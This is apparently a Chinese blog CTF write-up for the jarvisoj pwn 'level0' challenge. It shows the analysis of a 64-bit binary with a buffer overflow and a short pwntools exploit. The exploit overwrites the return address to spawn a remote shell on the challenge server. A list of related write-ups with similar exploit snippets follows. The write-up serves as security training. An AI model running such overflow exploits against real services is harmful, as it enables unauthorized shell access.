jarvisoj pwn level0

最新推荐文章于 2023-08-20 20:27:09 发布

Joey_l

最新推荐文章于 2023-08-20 20:27:09 发布

阅读量366

点赞数

CC 4.0 BY-SA版权

分类专栏： pwn

本文链接：https://blog.youkuaiyun.com/Joey_l/article/details/97974557

pwn 专栏收录该内容

3 篇文章

订阅专栏

本文记录了解决几道PWN题目过程，通过分析64位动态链接程序，利用IDA反汇编发现漏洞。在level0题中，通过覆盖vulnerable_function返回地址为system('/bin/sh')地址，构造payload实现远程代码执行。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

前几天做了几道pwn题，记录一下

https://www.jarvisoj.com/challenges

拿到程序后先file可知为64位程序和动态链接

file level0

然后checksec检查保护机制

checksec level0

将程序拖到ida中，F5反汇编，得到伪c代码

双击vulnerable_function()函数

可以看到read函数读0x200进入buf中，而buf空间只有0x80

shift+f12可查看到有/bin/sh，并且在400596处还有callsystem函数

思路：将vulnerable_function()函数的返回地址覆盖为system('/bin/sh')的地址

level0.py如下：

from pwn import *
sh=remote('pwn2.jarvisoj.com',9881)
paddding='a'*0x88
callsystem=0x400596
payload=padding+p64(callsystem)
sh.send(payload)
sh.interactive()
sh.close()

运行level0.py

python level0.py

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Joey_l

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

(Jarvis Oj)(Pwn) level0

Nothing

04-17

1251

(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。用ida反汇编。main函数就调用了两个函数。跟进第二个函数。找到溢出点，同过buf缓冲区。又找到函数callsystem()。只要控制程序返回到callsystem地址即可。找到callsystem地址。写得脚本。 1 from pwn ...

BUUCTF jarvisoj_level0

m0_54262894的博客

10-27

399

先checksec，仅开启了NX保护运行一下放入ida中查看main函数没有什么关键信息，双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节，而我们可以输入更多的数据接着找找后门函数这道题很简单，已经把后门给我们展示出来了记住后门函数的地址0x400596 做完以上步骤我们就有思路了：覆盖buf 的80个字节因为是64位的文件，然后再加8个字节...

参与评论您还未登录，请先登录后发表或查看评论

Jarvis Oj Pwn 学习笔记-level0

baoan4763的博客

05-31

222

一道64位的pwn题呈上地址：原文件：https://files.cnblogs.com/files/Magpie/level0.rar nc pwn2.jarvisoj.com 9881 先查一下保护：扔进ida：典型的64位栈溢出，莫得啥子难度，注意一哈64位即可控制流打到callsystem即可地址是：0x400596 直接贴ex...

JarvisOJ-PWN-Level0

杀生丸？不，其实我要的是桔梗

03-15

822

JarvisOJ-PWN-Level0 IDA打开分析。在Export找到这两个关键函数。先双击进入main 关键函数在vulnerable_function()，继续跟进。可以看出read函数是把标准输入的200位的写入buf中。再看buf：低位：高位：所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x00...

Jarvis OJ（PWN）level0

qq_43409582的博客

09-11

281

0x01 开始做Jarvisoj上的题了，先从最基本的开始吧。首先看保护：只开了NX，说明可能要利用栈溢出的知识。打开IDA看main函数没什么东西，但return了一个函数打开一看发现了栈溢出漏洞：然后找能利用的地方，发现了一个callsystem函数（太明显了）。。。所以思路就是利用栈溢出漏洞直接覆盖到/bin/sh执行的地址上，就能getshell 了。 exp.py: f...

Jarvis OJ-PWN-[XMAN]level0 wp

分不清东西南北的Laffey

09-22

1015

地址：nc pwn2.jarvisoj.com 9881 第一次做pwn的题目先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机把文件放进去用checksec看一下发现是64位的程序编译时关了栈不可执行保护这说明我们可以在buf里面输入shellcode和填...

jarvisoj pwn level5 wp

zszcr的博客

03-26

2032

题目要求练习 mmap和mprotect 函数不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下：void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...

日行一PWN jarvisoj_level0

m0_57221101的博客

05-14

269

还是来自于BUUCTF的机器，今天的很简单，就是单纯的考察了read函数的漏洞，以及对64位寄存器的理解开始首先还是经典查壳和内存保护，发现啥也没有，是很简单的机器。然后IDA反编译一下，由于是64位的软件所以需要IDA64 main函数首先可以看到主函数中知识调用了write函数，并输出了Hello， Worldn这么几个字到终端。之后调用了vulnerable_function函数因为反汇编并不会给出类似于write这种函数的定义，所以需要熟悉汇编的同学自行根据效果来

BUUCTF jarvisoj_level2 题解

qq_51802916的博客

08-20

604

可以看到程序中已经有了shell的字符串，由于是32位程序，函数的参数通过压栈传递，因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令，因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址，因此我们需要在这个地方随便填入一些值，然后在后面填入函数的第一个参数。，因此我们需要填充0x88个字符就能到达ebp的位置，然后再填充4个字符就能到达eip的位置，并且。可以看到是32位程序，栈上开启了不可执行保护，但是没有栈检测标志，推测需要进行缓冲区溢出。

Buu CTF PWN jarvisoj_level0 WriteUp

m0sway的博客

03-02

441

Buu CTF PWN题jarvisoj_level0的WriteUp

jarvis oj level0

发蝴蝶和大脑斧的博客

12-01

966

菜鸟入门，先从level0开始下手。首先checksec，发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida，查看vulnerable_function ssize_t...

jarvisoj_level0

shisuan1的博客

11-05

1946

jarvisoj_level0 通过命令检查文件类型file level0发现是64位的可执行文件然后用64-ida打开按F5显示伪代码，很简单这是一个hello world的程序然后开始分析可以看到main函数一共调用了三个函数然后依次检查函数，检查通过网上答案发现vunlnerable_function这个函数调用了200h的内存空间,其实作者也看不懂，建议进行这一步时先看...

【BUUCTF - PWN】jarvisoj_level0

古月浪子的博客

04-05

780

checksec一下，栈溢出 IDA打开看看，很明显的溢出和后门函数，一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...

CTF buuoj pwn-----第6题:jarvisoj_level0

bing_Max的博客

09-02

1156

CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析，IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机，下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'

Jarvis OJ　[XMAN]level0

九层台

07-07

492

查保护和运行操作系统 liu@liu-F117-F:~/桌面/oj/level0$ checksec level0 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0' Arch: amd64-64-little RELRO: No RELRO Stack: No canary foun...

jarvisoj——[XMAN]level0

王嘟嘟的博客

07-14

396

题目 Wp 拿下来之后发现是一个64位的，直接开ida main函数，现在对main函数已经很熟悉了这里看到一个方法这里按照规则覆盖即可。脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...

jarvis oj---level0解题方法

weixin_45427676的博客

09-29

381

题目场景： nc pwn2.jarvisoj.com 9881 level0.b9ded3801d6dd36a97468e128b81a65d 解题在虚拟机里打开终端，输入命令“checksec"查看有没有什么保护机制 checksec之后发现有NX保护将文件用IDA打开，F5键查看main函数，发现使用了vulnerable_function()函数，双击查看函数 read可以读入0x2...

攻防世界level0 + (Jarvis Oj)(Pwn) level1

qq_44832048的博客

07-24

2093

攻防世界level0 将文件在ida中打开，输出字符串helloWord之后执行vulnerable_function()函数，没有与用户交互，双击进去查看，，无参数传入，buf长度为0x80，即0x80h填充满，之后跟上地址就可以实现任意跳转。查找字符串这是 vulnerable_function 函数，可以在栈上写0x200个字节，或许我们可以进行溢出，覆盖掉返回地址...

(Jarvis Oj)(Pwn) level2(x64)

Nothing

04-19

1496

(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护，和level2一样。反汇编，程序和32位的程序几乎一致。找到溢出点。那么溢出思路也和32位的差不多，唯一不同的是，64位程序在调用system函数时，参数的传递方式和32位不一样，32位是通过栈传参，而64位通过edi寄存器传参，所以这时我们的思路变成如何覆盖edi的值，通过基本rop就可...

jarvisoj_level1